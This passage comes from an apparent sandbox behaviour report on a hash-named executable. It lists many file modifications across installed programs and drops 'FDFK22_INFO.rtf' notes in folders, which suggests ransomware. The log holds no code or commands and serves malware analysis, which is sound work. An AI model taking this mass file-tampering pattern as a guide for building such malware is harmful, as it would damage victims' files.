Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore.xmi_2.10.1.v20140901-1043.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\ECLIPSE_.RSA a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro_3.4.200.v20130326-1254.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\EST a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-api-caching_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\dumpmeta.luac a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\jconsole.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Windows Journal\Templates\Genko_2.jtp a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\org-netbeans-modules-profiler_visualvm.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santo_Domingo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javaws.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\license.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Niue a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Vincennes a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\javafx.policy a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\jfluid-server_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vimeo.luac a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\README.txt a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\lt.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\SaveAsRTF.api a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Atikokan a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Mozilla Firefox\uninstall\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Faroe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\ms.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.property.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.ui.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kabul a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\calendars.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\CST6CDT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\ECLIPSE_.RSA a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Windows Mail\WinMail.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Christmas a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Dawson_Creek a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Prague a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Moscow a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.console_1.1.0.v20140131-1639.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\epl-v10.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Aqtobe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-spi-quicksearch_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs-nio2_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sa_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp.zh_CN_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs.zh_CN_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\blacklist a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\El_Salvador a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-util-enumerations.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\ECLIPSE_.RSA a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.common_2.10.1.v20140901-1043.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\bin\servertool.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Zurich a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\ECLIPSE_.RSA a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\license.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\sv.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Guatemala a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\01_googleimage.luac a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Boa_Vista a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\ExpandFormat.vb a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Yakutat a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\zi\America\Argentina\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\WidevineCdm\LICENSE a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\en-GB.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyrun.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\San_Luis a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Warsaw a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\license.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Sydney a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\uarrow.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.identity_3.4.0.v20140827-1444.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\contbig.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Simferopol a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\LICENSE a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\clearkey.dll.sig a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-api_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-heapdump_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Khandyga a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\tools.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-1 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macTSFrame.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\bn.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Oral a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+7 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\feature.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Juneau a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Dawson_Creek a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nome a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\bookicon.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox_1.0.500.v20131211-1531.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Fakaofo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\MergeCompress.WTV a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\ReceivePing.ex_ a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfigInternal.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Brisbane a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.core_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Shanghai a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedbck2.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\RELEASE-NOTES.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\MANIFEST.MF a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Tahiti a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program 